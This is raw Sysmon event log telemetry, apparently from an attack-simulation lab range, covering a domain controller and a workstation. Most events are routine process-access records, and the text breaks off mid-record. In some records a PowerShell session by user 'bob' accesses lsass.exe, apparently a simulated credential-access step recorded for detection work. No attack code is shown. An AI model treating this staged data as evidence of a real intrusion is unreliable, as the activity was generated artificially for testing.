10341000x80000000000000001051084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}84725608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}84725608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:27.035{466BC892-F5E6-60EB-817D-00000000CF01}8472ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf6e0c09.TMPMD5=188226775E73527BA9F246638922D33D,SHA256=44D88392EAC5CF01F5BDB2D7E5F2991301D5C34AAB9FFC561E2B376D14959354,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808523Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.197{0C1E0330-F5E7-60EB-9A79-00000000D001}12882464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808522Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.041{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5E7-60EB-9A79-00000000D001}1288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808521Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.041{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808520Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:27.041{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808519Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.041{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808518Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:27.025{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808517Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.025{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808516Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:27.025{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808515Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.025{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808514Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:27.025{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808513Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.025{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808512Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.025{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F5E7-60EB-9A79-00000000D001}1288C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808511Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.025{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5E7-60EB-9A79-00000000D001}1288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808510Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.026{0C1E0330-F5E7-60EB-9A79-00000000D001}1288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:28.913{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AE7234FDD347460AF2622C429BA0E5E,SHA256=A8A27944959266304DDD6C252B0C5F0D681AD87FE0F9EE46639945FE87010C52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808555Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.556{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAE41EEC71DD43165E433B46AE5EC8F7,SHA256=F48CC6B5EA2886585AC6A2BAFA73D4AC582CE9859F0C8F07886AC571D0960AA2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808554Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.525{0C1E0330-F5E8-60EB-9C79-00000000D001}38242292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:28.460{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:28.460{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:28.339{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8BFF5AA4C89B9CDC54D2BAF29392A09,SHA256=6682B720B2E235571AD8C63B2335F162A6AF0522637799BE37EA435035145359,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:28.338{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7ED54AAA39EC62AEA3ECFFB92AF7C1E3,SHA256=B86B6F59F4CB0C2EBAEB131659986587B714FA17282D47C07C6A6CA0DA06BE7E,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001051095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 
07:57:28.286{466BC892-F5E6-60EB-817D-00000000CF01}8472\PSHost.132705502467981713.8472.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001051094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:28.255{466BC892-F5E6-60EB-817D-00000000CF01}8472ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_cajg4fsn.xj0.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:28.254{466BC892-F5E6-60EB-817D-00000000CF01}8472ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_wmucxxbg.whb.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001051092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:28.065{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_wmucxxbg.whb.ps12021-07-12 07:57:28.065 10341000x80000000000000001051091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:28.044{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808553Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.400{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5E8-60EB-9C79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808552Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808551Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 